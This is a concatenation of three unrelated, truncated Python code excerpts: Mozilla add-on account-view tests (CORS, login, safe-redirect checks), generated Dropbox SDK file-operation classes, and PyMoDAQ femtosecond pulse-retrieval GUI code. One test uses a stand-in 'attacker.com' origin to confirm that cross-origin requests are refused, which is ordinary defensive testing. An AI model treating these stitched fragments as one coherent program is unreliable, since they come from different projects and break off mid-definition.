assert has_cors_headers(response, origin='https://addons-frontend')
assert response.status_code == 200
def test_cors_localhost(self):
response = self.options(self.url, origin='http://localhost:3000')
assert has_cors_headers(response, origin='http://localhost:3000')
assert response.status_code == 200
def test_cors_other(self):
response = self.options(self.url, origin='https://attacker.com')
assert 'Access-Control-Allow-Origin' not in response
assert 'Access-Control-Allow-Methods' not in response
assert 'Access-Control-Allow-Headers' not in response
assert 'Access-Control-Allow-Credentials' not in response
assert response.status_code == 200
class TestLoginStartView(TestCase):
def test_default_config_is_used(self):
assert views.LoginStartView.DEFAULT_FXA_CONFIG_NAME == 'default'
assert views.LoginStartView.ALLOWED_FXA_CONFIGS == (
['default', 'amo', 'local'])
class TestLoginUser(TestCase):
def setUp(self):
self.request = APIRequestFactory().get('/login')
self.enable_messages(self.request)
self.user = UserProfile.objects.create(
email='<EMAIL>', fxa_id='9001')
self.identity = {'email': '<EMAIL>', 'uid': '9001'}
patcher = mock.patch('olympia.accounts.views.login')
self.login = patcher.start()
self.addCleanup(patcher.stop)
patcher = mock.patch('olympia.users.models.commonware.log')
commonware_log = patcher.start()
commonware_log.get_remote_addr.return_value = '8.8.8.8'
self.addCleanup(patcher.stop)
def test_user_gets_logged_in(self):
assert len(get_messages(self.request)) == 0
views.login_user(self.request, self.user, self.identity)
self.login.assert_called_with(self.request, self.user)
assert len(get_messages(self.request)) == 0
def test_login_attempt_is_logged(self):
now = datetime.now()
self.user.update(last_login_attempt=now)
views.login_user(self.request, self.user, self.identity)
self.login.assert_called_with(self.request, self.user)
assert self.user.last_login_attempt > now
assert self.user.last_login_ip == '8.8.8.8'
def test_fxa_data_gets_set_migrating(self):
assert len(get_messages(self.request)) == 0
self.user.update(fxa_id=None)
views.login_user(self.request, self.user, self.identity)
user = self.user.reload()
assert user.fxa_id == '9001'
assert not user.has_usable_password()
assert len(get_messages(self.request)) == 1
def test_fxa_data_gets_set_migration_over(self):
assert len(get_messages(self.request)) == 0
self.user.update(fxa_id=None)
self.create_switch('fxa-migrated', active=True)
views.login_user(self.request, self.user, self.identity)
user = self.user.reload()
assert user.fxa_id == '9001'
assert not user.has_usable_password()
assert len(get_messages(self.request)) == 0
def test_email_address_can_change(self):
assert len(get_messages(self.request)) == 0
self.user.update(email='<EMAIL>')
views.login_user(self.request, self.user, self.identity)
user = self.user.reload()
assert user.fxa_id == '9001'
assert user.email == '<EMAIL>'
assert len(get_messages(self.request)) == 0
class TestFindUser(TestCase):
def test_user_exists_with_uid(self):
user = UserProfile.objects.create(fxa_id='9999', email='<EMAIL>')
found_user = views.find_user({'uid': '9999', 'email': '<EMAIL>'})
assert user == found_user
def test_user_exists_with_email(self):
user = UserProfile.objects.create(fxa_id='9999', email='<EMAIL>')
found_user = views.find_user({'uid': '8888', 'email': '<EMAIL>'})
assert user == found_user
def test_user_exists_with_both(self):
user = UserProfile.objects.create(fxa_id='9999', email='<EMAIL>')
found_user = views.find_user({'uid': '9999', 'email': '<EMAIL>'})
assert user == found_user
def test_two_users_exist(self):
UserProfile.objects.create(
fxa_id='9999', email='<EMAIL>', username='me')
UserProfile.objects.create(
fxa_id='8888', email='<EMAIL>', username='you')
with self.assertRaises(UserProfile.MultipleObjectsReturned):
views.find_user({'uid': '9999', 'email': '<EMAIL>'})
class TestRenderErrorHTML(TestCase):
def make_request(self):
request = APIRequestFactory().get(reverse('accounts.authenticate'))
request.user = AnonymousUser()
return self.enable_messages(request)
def login_url(self, **params):
return urlparams(reverse('users.login'), **params)
def migrate_url(self, **params):
return absolutify(urlparams(reverse('users.migrate'), **params))
def render_error(self, request, error, next_path=None):
return views.render_error(
request, error, format='html', next_path=next_path)
def test_error_no_code_with_safe_path(self):
request = self.make_request()
assert len(get_messages(request)) == 0
response = self.render_error(
request, views.ERROR_NO_CODE, next_path='/over/here')
assert response.status_code == 302
messages = get_messages(request)
assert len(messages) == 1
assert 'could not be parsed' in next(iter(messages)).message
assert_url_equal(response['location'], self.login_url(to='/over/here'))
def test_error_no_profile_with_no_path(self):
request = self.make_request()
assert len(get_messages(request)) == 0
response = self.render_error(request, views.ERROR_NO_PROFILE)
assert response.status_code == 302
messages = get_messages(request)
assert len(messages) == 1
assert ('Firefox Account could not be found'
in next(iter(messages)).message)
assert_url_equal(response['location'], self.login_url())
def test_error_state_mismatch_with_unsafe_path(self):
request = self.make_request()
assert len(get_messages(request)) == 0
response = self.render_error(
request, views.ERROR_STATE_MISMATCH,
next_path='https://www.google.com/')
assert response.status_code == 302
messages = get_messages(request)
assert len(messages) == 1
assert 'could not be logged in' in next(iter(messages)).message
assert_url_equal(response['location'], self.login_url())
def test_error_no_code_with_safe_path_logged_in(self):
request = self.make_request()
request.user = UserProfile()
assert len(get_messages(request)) == 0
response = self.render_error(
request, views.ERROR_NO_CODE, next_path='/over/here')
assert response.status_code == 302
messages = get_messages(request)
assert len(messages) == 1
assert 'could not be parsed' in next(iter(messages)).message
assert_url_equal(
response['location'],
self.migrate_url(to='/over/here'))
class TestRenderErrorJSON(TestCase):
def setUp(self):
patcher = mock.patch('olympia.accounts.views.Response')
self.Response = patcher.start()
self.addCleanup(patcher.stop)
def make_request(self):
return APIRequestFactory().post(reverse('accounts.login'))
def render_error(self, error):
views.render_error(self.make_request(), error, format='json')
def test_unknown_error(self):
self.render_error('not-an-error')
self.Response.assert_called_with({'error': 'not-an-error'}, status=422)
def test_error_no_profile(self):
self.render_error(views.ERROR_NO_PROFILE)
self.Response.assert_called_with(
{'error': views.ERROR_NO_PROFILE}, status=401)
def test_error_state_mismatch(self):
self.render_error(views.ERROR_STATE_MISMATCH)
self.Response.assert_called_with(
{'error': views.ERROR_STATE_MISMATCH}, status=400)
class TestWithUser(TestCase):
def setUp(self):
self.fxa_identify = self.patch(
'olympia.accounts.views.verify.fxa_identify')
self.find_user = self.patch('olympia.accounts.views.find_user')
self.render_error = self.patch('olympia.accounts.views.render_error')
self.request = mock.MagicMock()
self.user = UserProfile()
self.request.user = self.user
self.request.session = {'fxa_state': 'some-blob'}
@views.with_user(format='json')
def fn(*args, **kwargs):
return args, kwargs
def test_profile_exists_with_user(self):
identity = {'uid': '1234', 'email': '<EMAIL>'}
self.fxa_identify.return_value = identity
self.find_user.return_value = self.user
self.user.is_authenticated = lambda: False
self.request.data = {'code': 'foo', 'state': 'some-blob'}
args, kwargs = self.fn(self.request)
assert args == (self, self.request)
assert kwargs == {
'user': self.user,
'identity': identity,
'next_path': None,
}
def test_profile_exists_with_user_and_path(self):
identity = {'uid': '1234', 'email': '<EMAIL>'}
self.fxa_identify.return_value = identity
self.find_user.return_value = self.user
self.user.is_authenticated = lambda: False
# "/a/path/?" gets URL safe base64 encoded to L2EvcGF0aC8_.
self.request.data = {
'code': 'foo',
'state': u'some-blob:{next_path}'.format(
next_path=base64.urlsafe_b64encode('/a/path/?')),
}
args, kwargs = self.fn(self.request)
assert args == (self, self.request)
assert kwargs == {
'user': self.user,
'identity': identity,
'next_path': '/a/path/?',
}
def test_profile_exists_with_user_and_path_stripped_padding(self):
identity = {'uid': '1234', 'email': '<EMAIL>'}
self.fxa_identify.return_value = identity
self.find_user.return_value = self.user
self.user.is_authenticated = lambda: False
# "/foo" gets URL safe base64 encoded to L2Zvbw== so it will be L2Zvbw.
self.request.data = {
'code': 'foo',
'state': u'some-blob:{next_path}'.format(next_path='L2Zvbw'),
}
args, kwargs = self.fn(self.request)
assert args == (self, self.request)
assert kwargs == {
'user': self.user,
'identity': identity,
'next_path': '/foo',
}
def test_profile_exists_with_user_and_path_bad_encoding(self):
identity = {'uid': '1234', 'email': '<EMAIL>'}
self.fxa_identify.return_value = identity
self.find_user.return_value = self.user
self.user.is_authenticated = lambda: False
self.request.data = {
'code': 'foo',
'state': u'some-blob:/raw/path',
}
args, kwargs = self.fn(self.request)
assert args == (self, self.request)
assert kwargs == {
'user': self.user,
'identity': identity,
'next_path': None,
}
def test_profile_exists_with_user_and_empty_path(self):
identity = {'uid': '1234', 'email': '<EMAIL>'}
self.fxa_identify.return_value = identity
self.find_user.return_value = self.user
self.user.is_authenticated = lambda: False
self.request.data = {
'code': 'foo',
'state': u'some-blob:',
}
args, kwargs = self.fn(self.request)
assert args == (self, self.request)
assert kwargs == {
'user': self.user,
'identity': identity,
'next_path': None,
}
def test_profile_exists_with_user_and_path_is_not_safe(self):
identity = {'uid': '1234', 'email': '<EMAIL>'}
self.fxa_identify.return_value = identity
self.find_user.return_value = self.user
self.user.is_authenticated = lambda: False
self.request.data = {
'code': 'foo',
'state': u'some-blob:{next_path}'.format(
next_path=base64.urlsafe_b64encode('https://www.google.com')),
}
args, kwargs = self.fn(self.request)
assert args == (self, self.request)
assert kwargs == {
'user': self.user,
'identity': identity,
'next_path': None,
}
def test_profile_exists_no_user(self):
identity = {'uid': '1234', 'email': '<EMAIL>'}
self.fxa_identify.return_value = identity
self.find_user.return_value = None
self.request.data = {'code': 'foo', 'state': 'some-blob'}
self.user.is_authenticated = lambda: False
args, kwargs = self.fn(self.request)
assert args == (self, self.request)
assert kwargs == {
'user': None,
'identity': identity,
'next_path': None,
}
def test_profile_does_not_exist(self):
self.fxa_identify.side_effect = verify.IdentificationError
self.request.data = {'code': 'foo', 'state': 'some-blob'}
self.fn(self.request)
| |
= val
self._metadata_present = True
@metadata.deleter
def metadata(self):
self._metadata_value = None
self._metadata_present = False
def _process_custom_annotations(self, annotation_type, field_path, processor):
super(RelocationBatchResultData, self)._process_custom_annotations(annotation_type, field_path, processor)
def __repr__(self):
return 'RelocationBatchResultData(metadata={!r})'.format(
self._metadata_value,
)
RelocationBatchResultData_validator = bv.Struct(RelocationBatchResultData)
class RelocationBatchResultEntry(bb.Union):
"""
This class acts as a tagged union. Only one of the ``is_*`` methods will
return true. To get the associated value of a tag (if one exists), use the
corresponding ``get_*`` method.
"""
_catch_all = 'other'
# Attribute is overwritten below the class definition
other = None
@classmethod
def success(cls, val):
"""
Create an instance of this class set to the ``success`` tag with value
``val``.
:param Metadata val:
:rtype: RelocationBatchResultEntry
"""
return cls('success', val)
@classmethod
def failure(cls, val):
"""
Create an instance of this class set to the ``failure`` tag with value
``val``.
:param RelocationBatchErrorEntry val:
:rtype: RelocationBatchResultEntry
"""
return cls('failure', val)
def is_success(self):
"""
Check if the union tag is ``success``.
:rtype: bool
"""
return self._tag == 'success'
def is_failure(self):
"""
Check if the union tag is ``failure``.
:rtype: bool
"""
return self._tag == 'failure'
def is_other(self):
"""
Check if the union tag is ``other``.
:rtype: bool
"""
return self._tag == 'other'
def get_success(self):
"""
Only call this if :meth:`is_success` is true.
:rtype: Metadata
"""
if not self.is_success():
raise AttributeError("tag 'success' not set")
return self._value
def get_failure(self):
"""
Only call this if :meth:`is_failure` is true.
:rtype: RelocationBatchErrorEntry
"""
if not self.is_failure():
raise AttributeError("tag 'failure' not set")
return self._value
def _process_custom_annotations(self, annotation_type, field_path, processor):
super(RelocationBatchResultEntry, self)._process_custom_annotations(annotation_type, field_path, processor)
def __repr__(self):
return 'RelocationBatchResultEntry(%r, %r)' % (self._tag, self._value)
RelocationBatchResultEntry_validator = bv.Union(RelocationBatchResultEntry)
class RelocationBatchV2JobStatus(async_.PollResultBase):
"""
Result returned by :meth:`dropbox.dropbox.Dropbox.files_copy_batch_check` or
:meth:`dropbox.dropbox.Dropbox.files_move_batch_check` that may either be in
progress or completed with result for each entry.
This class acts as a tagged union. Only one of the ``is_*`` methods will
return true. To get the associated value of a tag (if one exists), use the
corresponding ``get_*`` method.
:ivar RelocationBatchV2Result RelocationBatchV2JobStatus.complete: The copy
or move batch job has finished.
"""
@classmethod
def complete(cls, val):
"""
Create an instance of this class set to the ``complete`` tag with value
``val``.
:param RelocationBatchV2Result val:
:rtype: RelocationBatchV2JobStatus
"""
return cls('complete', val)
def is_complete(self):
"""
Check if the union tag is ``complete``.
:rtype: bool
"""
return self._tag == 'complete'
def get_complete(self):
"""
The copy or move batch job has finished.
Only call this if :meth:`is_complete` is true.
:rtype: RelocationBatchV2Result
"""
if not self.is_complete():
raise AttributeError("tag 'complete' not set")
return self._value
def _process_custom_annotations(self, annotation_type, field_path, processor):
super(RelocationBatchV2JobStatus, self)._process_custom_annotations(annotation_type, field_path, processor)
def __repr__(self):
return 'RelocationBatchV2JobStatus(%r, %r)' % (self._tag, self._value)
RelocationBatchV2JobStatus_validator = bv.Union(RelocationBatchV2JobStatus)
class RelocationBatchV2Launch(async_.LaunchResultBase):
"""
Result returned by :meth:`dropbox.dropbox.Dropbox.files_copy_batch` or
:meth:`dropbox.dropbox.Dropbox.files_move_batch` that may either launch an
asynchronous job or complete synchronously.
This class acts as a tagged union. Only one of the ``is_*`` methods will
return true. To get the associated value of a tag (if one exists), use the
corresponding ``get_*`` method.
"""
@classmethod
def complete(cls, val):
"""
Create an instance of this class set to the ``complete`` tag with value
``val``.
:param RelocationBatchV2Result val:
:rtype: RelocationBatchV2Launch
"""
return cls('complete', val)
def is_complete(self):
"""
Check if the union tag is ``complete``.
:rtype: bool
"""
return self._tag == 'complete'
def get_complete(self):
"""
Only call this if :meth:`is_complete` is true.
:rtype: RelocationBatchV2Result
"""
if not self.is_complete():
raise AttributeError("tag 'complete' not set")
return self._value
def _process_custom_annotations(self, annotation_type, field_path, processor):
super(RelocationBatchV2Launch, self)._process_custom_annotations(annotation_type, field_path, processor)
def __repr__(self):
return 'RelocationBatchV2Launch(%r, %r)' % (self._tag, self._value)
RelocationBatchV2Launch_validator = bv.Union(RelocationBatchV2Launch)
class RelocationBatchV2Result(FileOpsResult):
"""
:ivar files.RelocationBatchV2Result.entries: Each entry in
CopyBatchArg.entries or ``MoveBatchArg.entries`` will appear at the same
position inside ``RelocationBatchV2Result.entries``.
"""
__slots__ = [
'_entries_value',
'_entries_present',
]
_has_required_fields = True
def __init__(self,
entries=None):
super(RelocationBatchV2Result, self).__init__()
self._entries_value = None
self._entries_present = False
if entries is not None:
self.entries = entries
@property
def entries(self):
"""
Each entry in CopyBatchArg.entries or ``MoveBatchArg.entries`` will
appear at the same position inside ``RelocationBatchV2Result.entries``.
:rtype: list of [RelocationBatchResultEntry]
"""
if self._entries_present:
return self._entries_value
else:
raise AttributeError("missing required field 'entries'")
@entries.setter
def entries(self, val):
val = self._entries_validator.validate(val)
self._entries_value = val
self._entries_present = True
@entries.deleter
def entries(self):
self._entries_value = None
self._entries_present = False
def _process_custom_annotations(self, annotation_type, field_path, processor):
super(RelocationBatchV2Result, self)._process_custom_annotations(annotation_type, field_path, processor)
def __repr__(self):
return 'RelocationBatchV2Result(entries={!r})'.format(
self._entries_value,
)
RelocationBatchV2Result_validator = bv.Struct(RelocationBatchV2Result)
class RelocationResult(FileOpsResult):
"""
:ivar files.RelocationResult.metadata: Metadata of the relocated object.
"""
__slots__ = [
'_metadata_value',
'_metadata_present',
]
_has_required_fields = True
def __init__(self,
metadata=None):
super(RelocationResult, self).__init__()
self._metadata_value = None
self._metadata_present = False
if metadata is not None:
self.metadata = metadata
@property
def metadata(self):
"""
Metadata of the relocated object.
:rtype: Metadata
"""
if self._metadata_present:
return self._metadata_value
else:
raise AttributeError("missing required field 'metadata'")
@metadata.setter
def metadata(self, val):
self._metadata_validator.validate_type_only(val)
self._metadata_value = val
self._metadata_present = True
@metadata.deleter
def metadata(self):
self._metadata_value = None
self._metadata_present = False
def _process_custom_annotations(self, annotation_type, field_path, processor):
super(RelocationResult, self)._process_custom_annotations(annotation_type, field_path, processor)
def __repr__(self):
return 'RelocationResult(metadata={!r})'.format(
self._metadata_value,
)
RelocationResult_validator = bv.Struct(RelocationResult)
class RestoreArg(bb.Struct):
"""
:ivar files.RestoreArg.path: The path to save the restored file.
:ivar files.RestoreArg.rev: The revision to restore.
"""
__slots__ = [
'_path_value',
'_path_present',
'_rev_value',
'_rev_present',
]
_has_required_fields = True
def __init__(self,
path=None,
rev=None):
self._path_value = None
self._path_present = False
self._rev_value = None
self._rev_present = False
if path is not None:
self.path = path
if rev is not None:
self.rev = rev
@property
def path(self):
"""
The path to save the restored file.
:rtype: str
"""
if self._path_present:
return self._path_value
else:
raise AttributeError("missing required field 'path'")
@path.setter
def path(self, val):
val = self._path_validator.validate(val)
self._path_value = val
self._path_present = True
@path.deleter
def path(self):
self._path_value = None
self._path_present = False
@property
def rev(self):
"""
The revision to restore.
:rtype: str
"""
if self._rev_present:
return self._rev_value
else:
raise AttributeError("missing required field 'rev'")
@rev.setter
def rev(self, val):
val = self._rev_validator.validate(val)
self._rev_value = val
self._rev_present = True
@rev.deleter
def rev(self):
self._rev_value = None
self._rev_present = False
def _process_custom_annotations(self, annotation_type, field_path, processor):
super(RestoreArg, self)._process_custom_annotations(annotation_type, field_path, processor)
def __repr__(self):
return 'RestoreArg(path={!r}, rev={!r})'.format(
self._path_value,
self._rev_value,
)
RestoreArg_validator = bv.Struct(RestoreArg)
class RestoreError(bb.Union):
"""
This class acts as a tagged union. Only one of the ``is_*`` methods will
return true. To get the associated value of a tag (if one exists), use the
corresponding ``get_*`` method.
:ivar LookupError RestoreError.path_lookup: An error occurs when downloading
metadata for the file.
:ivar WriteError RestoreError.path_write: An error occurs when trying to
restore the file to that path.
:ivar files.RestoreError.invalid_revision: The revision is invalid. It may
not exist.
"""
_catch_all = 'other'
# Attribute is overwritten below the class definition
invalid_revision = None
# Attribute is overwritten below the class definition
other = None
@classmethod
def path_lookup(cls, val):
"""
Create an instance of this class set to the ``path_lookup`` tag with
value ``val``.
:param LookupError val:
:rtype: RestoreError
"""
return cls('path_lookup', val)
@classmethod
def path_write(cls, val):
"""
Create an instance of this class set to the ``path_write`` tag with
value ``val``.
:param WriteError val:
:rtype: RestoreError
"""
return cls('path_write', val)
def is_path_lookup(self):
"""
Check if the union tag is ``path_lookup``.
:rtype: bool
"""
return self._tag == 'path_lookup'
def is_path_write(self):
"""
Check if the union tag is ``path_write``.
:rtype: bool
"""
return self._tag == 'path_write'
def is_invalid_revision(self):
"""
Check if the union tag is ``invalid_revision``.
:rtype: bool
"""
return self._tag == 'invalid_revision'
def is_other(self):
"""
Check if the union tag is ``other``.
:rtype: bool
"""
return self._tag == 'other'
def get_path_lookup(self):
"""
An error occurs when downloading metadata for the file.
Only call this if :meth:`is_path_lookup` is true.
:rtype: LookupError
"""
if not self.is_path_lookup():
raise AttributeError("tag 'path_lookup' not set")
return self._value
def get_path_write(self):
"""
An error occurs when trying to restore the file to that path.
Only call this if :meth:`is_path_write` is true.
:rtype: WriteError
"""
if not self.is_path_write():
raise AttributeError("tag 'path_write' not set")
return self._value
def _process_custom_annotations(self, annotation_type, field_path, processor):
super(RestoreError, self)._process_custom_annotations(annotation_type, field_path, processor)
def __repr__(self):
return 'RestoreError(%r, %r)' % (self._tag, self._value)
RestoreError_validator = bv.Union(RestoreError)
class SaveCopyReferenceArg(bb.Struct):
"""
:ivar files.SaveCopyReferenceArg.copy_reference: A copy reference returned
by :meth:`dropbox.dropbox.Dropbox.files_copy_reference_get`.
:ivar files.SaveCopyReferenceArg.path: Path in the user's Dropbox that is
the destination.
"""
__slots__ = [
'_copy_reference_value',
'_copy_reference_present',
'_path_value',
'_path_present',
]
_has_required_fields = True
def __init__(self,
copy_reference=None,
path=None):
self._copy_reference_value | |
data_widget.layout().addWidget(toolbar_data)
data_widget.layout().addWidget(self.data_canvas)
self.ui.dock_retrieved_data.addWidget(data_widget)
##################################################
# setup propagation dock
prop_widget = QtWidgets.QWidget()
prop_widget.setLayout(QtWidgets.QVBoxLayout())
param_widget = QtWidgets.QWidget()
param_widget.setLayout(QtWidgets.QHBoxLayout())
param_widget.setMinimumHeight(300)
self.prop_tree = ParameterTree()
self.pulse_tree = ParameterTree()
param_widget.layout().addWidget(self.prop_tree,1)
param_widget.layout().addWidget(self.pulse_tree, 1)
prop_widget.layout().addWidget(param_widget,1)
propagated_widget = QtWidgets.QWidget()
prop_widget.layout().addWidget(propagated_widget,5)
self.ui.dock_propagation.addWidget(prop_widget)
self.prop_canvas = MplCanvas(propagated_widget, width=5, height=4, dpi=100)
# Create toolbar, passing canvas as first parament, parent (self, the MainWindow) as second.
toolbar_prop = NavigationToolbar(self.prop_canvas, propagated_widget)
propagated_widget.setLayout(QtWidgets.QVBoxLayout())
propagated_widget.layout().addWidget(toolbar_prop)
propagated_widget.layout().addWidget(self.prop_canvas)
self.prop_tree.setParameters(self.prop_settings, showTop=False)
self.pulse_tree.setParameters(self.pulse_settings, showTop=False)
self.ui.dock_data_in.raiseDock()
def open_simulator(self):
simulator_widget = QtWidgets.QWidget()
self.simulator = Simulator(simulator_widget)
simulator_widget.setWindowTitle('PyMoDAQ Femto Simulator')
simulator_widget.show()
def load_from_simulator(self):
if self.simulator is not None:
data, axis, parameter_axis = self.simulator.trace_exp(Npts=512)
spectrum_axis, spectrum = self.simulator.spectrum_exp(Npts=512)
if self.data_in is None:
self.data_in = DataIn(source='simulated')
self.data_in.update(dict(source='simulated',
raw_spectrum=dict(data=spectrum, x_axis=spectrum_axis),
raw_trace=dict(data=data, x_axis=axis, y_axis=parameter_axis)))
self.display_data_in()
self.update_spectrum_info(self.data_in['raw_spectrum'])
self.update_trace_info(self.data_in['raw_trace'])
for child in putils.iter_children_params(self.settings.child('algo'), childlist=[]):
path = ['algo']
path.extend(self.settings.child('algo').childPath(child))
self.settings.child(*path).setValue(self.simulator.settings.child(*path).value())
self.settings.child('data_in_info', 'loaded_file').setValue('Simulation')
def update_spectrum_info(self, raw_spectrum):
wl0, fwhm = utils.my_moment(raw_spectrum['x_axis']['data'], raw_spectrum['data'])
self.settings.child('data_in_info', 'spectrum_in_info', 'wl0').setValue(wl0 * 1e9)
self.settings.child('data_in_info', 'spectrum_in_info', 'wl_fwhm').setValue(fwhm * 1e9)
self.settings.child('data_in_info', 'spectrum_in_info',
'spectrum_size').setValue(len(raw_spectrum['data']))
self.settings.child('processing', 'grid_settings', 'wl0').setValue(wl0 * 1e9)
self.state.append("spectrum_loaded")
def update_trace_info(self, raw_trace):
wl0, fwhm = utils.my_moment(raw_trace['x_axis']['data'], np.sum(raw_trace['data'], 0))
self.settings.child('data_in_info', 'trace_in_info', 'wl0').setValue(wl0 * 1e9)
self.settings.child('data_in_info', 'trace_in_info', 'wl_fwhm').setValue(fwhm * 1e9)
self.settings.child('data_in_info', 'trace_in_info', 'trace_param_size').setValue(
len(raw_trace['y_axis']['data']))
self.settings.child('data_in_info', 'trace_in_info',
'trace_wl_size').setValue(len(raw_trace['x_axis']['data']))
self.settings.child('processing', 'grid_settings',
'npoints').setValue(next_fast_len(len(raw_trace['x_axis']['data'])))
method = self.settings.child('algo', 'method').value()
if not (method == 'dscan' or method == 'miips'):
self.settings.child('processing', 'grid_settings',
'time_resolution').setValue(np.mean(
np.diff(raw_trace['y_axis']['data'])) * 1e15)
self.state.append("trace_loaded")
def generate_ft_grid(self):
wl0 = self.settings.child('processing', 'grid_settings', 'wl0').value() * 1e-9
Npts = self.settings.child('processing', 'grid_settings', 'npoints').value()
dt = self.settings.child('processing', 'grid_settings', 'time_resolution').value() * 1e-15
self.ft = FourierTransform(Npts, dt, w0=wl2om(-wl0 - 300e-9))
def process_trace(self):
if "trace_loaded" not in self.state:
popup_message("Error", "Please load a trace first!")
return
if "spectrum_processed" not in self.state:
popup_message("Error", "Please process the spectrum first")
return
self.ui.dock_processed.raiseDock()
if self.pnps is None:
logger.info('PNPS is not yet defined, process the spectrum first')
return
trace_in = self.get_trace_in()
# TODO
# ## substract bright spots range (if any)
# if len(self.viewer_trace_in.roi_manager.ROIs) > 0:
# roi = [self.viewer_trace_in.roi_manager.ROIs.keys()][0]
# pos = self.viewer_trace_in.roi_manager.ROIs[roi].pos()
# width, height = self.viewer_trace_in.roi_manager.ROIs[roi].size()
# xlim_pxls = np.array([pos.x(), pos.y()+width])
# ylim_pxls = np.array([pos.x(), pos.y() + height])
# xlim, ylim = self.viewer_trace_in.scale_axis(xlim_pxls, ylim_pxls)
# trace_in = preprocess(trace_in, signal_range=None, bright_signal_range=tuple(xlim)) # bright_signal_range doesn't exists yet'
if self.settings.child('processing', 'linearselect', 'dosubstract').value():
xlim = np.array((self.settings.child('processing', 'linearselect', 'wl0').value(),
self.settings.child('processing', 'linearselect', 'wl1').value())) * 1e-9
trace_in = preprocess(trace_in, signal_range=None, dark_signal_range=tuple(xlim))
if self.settings.child('processing', 'ROIselect', 'crop_trace').value():
x0 = self.settings.child('processing', 'ROIselect', 'x0').value()
y0 = self.settings.child('processing', 'ROIselect', 'y0').value()
width = self.settings.child('processing', 'ROIselect', 'width').value()
height = self.settings.child('processing', 'ROIselect', 'height').value()
xlim_pxls = np.array([x0, x0+width])
ylim_pxls = np.array([y0, y0+height])
xlim, ylim = self.viewer_trace_in.scale_axis(xlim_pxls, ylim_pxls)
trace_in = preprocess(trace_in, signal_range=(tuple(ylim), tuple(xlim)))
self.data_in['trace_in'] = trace_in
preprocess2(self.data_in['trace_in'], self.pnps)
self.state.append("trace_processed")
self.trace_canvas.figure.clf()
MeshDataPlot(trace_in, self.trace_canvas.figure, limit=True)
self.trace_canvas.draw()
def process_both(self):
self.process_spectrum()
self.process_trace()
def propagate(self):
if "result_ok" not in self.state:
popup_message("Error", "Complete the retrieval first")
return
self.ui.dock_propagation.raiseDock()
self.propagated_pulse = Pulse(self.result.pnps.ft, self.result.pnps.w0, unit="om")
self.propagated_pulse.spectrum = self.result.pulse_retrieved
material_list = []
material_list.append(self.prop_settings.child('materials', 'material1').value())
material_list.append(self.prop_settings.child('materials', 'material2').value())
thickness_list = []
thickness_list.append(self.prop_settings.child('materials', 'thickness1').value())
thickness_list.append(self.prop_settings.child('materials', 'thickness2').value())
for material, length in zip(material_list, thickness_list):
item = getattr(pymodaq_femto.materials, material)
w1, w2 = sorted(wl2om(np.array(item._range)))
w = self.propagated_pulse.w+ self.propagated_pulse.w0
valid = (w >= w1) & (w <= w2)
w = w[valid]
k = item.k(w, unit='om')
k0 = item.k(self.propagated_pulse.w0, unit='om')
k1 = item.k(self.propagated_pulse.w0 + self.propagated_pulse.ft.dw, unit="om")
dk = (k1 - k0) / self.propagated_pulse.ft.dw
#Add material dispersion without 0th and 1st Taylor orders (they don't change the pulse)
kfull = np.zeros_like(self.propagated_pulse.w)
kfull[valid] = (k - k0 - dk * self.propagated_pulse.w[valid])
self.propagated_pulse.spectrum *= np.exp(1j * kfull * 1e-3 * length)
phasepoly = fit_pulse_phase(self.propagated_pulse, self.prop_settings.child('materials', 'fit_threshold').value(), 4)
self.propagated_pulse.spectrum *= np.exp(- 1j * np.poly1d(phasepoly[-1])(self.propagated_pulse.w))
self.propagated_pulse.spectrum *= np.exp(- 1j * np.poly1d(phasepoly[-2])(self.propagated_pulse.w))
self.pulse_settings.child('pulse_prop', 'gdd').setValue(truncate(phasepoly[-3]*1e30*2,4))
self.pulse_settings.child('pulse_prop', 'tod').setValue(truncate(phasepoly[-4]*1e45*6,4))
self.pulse_settings.child('pulse_prop', 'fod').setValue(truncate(phasepoly[-5]*1e60*24,4))
self.update_fwhm()
plot_oversampling = self.prop_settings.child('materials', 'prop_oversampling').value()
self.prop_canvas.figure.clf()
PulsePropagationPlot(self.propagated_pulse, phasepoly, fwhm = self.pulse_settings.child('pulse_prop', 'fwhm_meas').value(),
fig=self.prop_canvas.figure, oversampling = plot_oversampling,
phase_blanking=True, phase_blanking_threshold=self.prop_settings.child('materials', 'fit_threshold').value())
self.prop_canvas.draw()
def update_fwhm(self):
precision = 1e-15 * self.prop_settings.child('materials', 'dt_fwhm').value()
try:
fwhm = 1e15 * self.propagated_pulse.fwhm(precision)
self.pulse_settings.child('pulse_prop', 'fwhm_meas').setValue(truncate(fwhm,4))
# self.pulse_settings.child('pulse_prop', 'fwhm_ftl').setValue(truncate(1e15 * self.data_in['pulse_in'].fwhm(precision),4))
# ratio_ideal = lib.abs2(self.propagated_pulse.field).max() / lib.abs2(ftl.field).max()
# self.pulse_settings.child('pulse_prop', 'ratio_main_pulse').setValue(truncate(ratio_ideal*100,4))
except ValueError:
warnings.warn("FWHM is undefined.")
self.pulse_settings.child('pulse_prop', 'fwhm_meas').setValue(0)
def process_spectrum(self):
if "spectrum_loaded" not in self.state:
popup_message("Error", "Please load a spectrum first!")
return
self.ui.dock_processed.raiseDock()
self.generate_ft_grid()
method = self.settings.child('algo', 'method').value()
nlprocess = self.settings.child('algo', 'nlprocess').value()
wl0 = self.settings.child('data_in_info', 'trace_in_info', 'wl0').value() * 1e-9
spectrum = self.data_in['raw_spectrum']['data']
wavelength = self.data_in['raw_spectrum']['x_axis']['data']
if 'shg' in nlprocess:
wl0real = 2 * wl0
elif 'thg' in nlprocess:
wl0real = 3 * wl0
else:
wl0real = wl0
self.data_in['pulse_in'] = Pulse(self.ft, wl0real)
for roi in self.viewer_spectrum_in.roi_manager.ROIs:
range = self.viewer_spectrum_in.roi_manager.ROIs[roi].pos()
spectrum = mask(wavelength, spectrum, (range[0] <= wavelength) & (wavelength <= range[1]))
self.data_in['pulse_in'] = pulse_from_spectrum(wavelength, spectrum, pulse=self.data_in['pulse_in'])
#self.pnps = PNPS(self.data_in['pulse_in'], method, nlprocess)
if method == 'dscan':
material = materials[self.settings.child('algo', 'material').value()]
self.pnps = PNPS(self.data_in['pulse_in'], method, nlprocess, material=material)
parameter = utils.linspace_step(self.settings.child('algo', 'dscan_parameter', 'min').value(),
self.settings.child('algo', 'dscan_parameter', 'max').value(),
self.settings.child('algo', 'dscan_parameter', 'step').value())
parameter *= 1e-3
elif method == 'miips':
alpha = self.settings.child('algo', 'alpha').value()
gamma = self.settings.child('algo', 'gamma').value()
self.pnps = PNPS(self.data_in['pulse_in'], method, nlprocess, alpha=alpha, gamma=gamma)
parameter = utils.linspace_step(self.settings.child('algo', 'miips_parameter', 'min').value(),
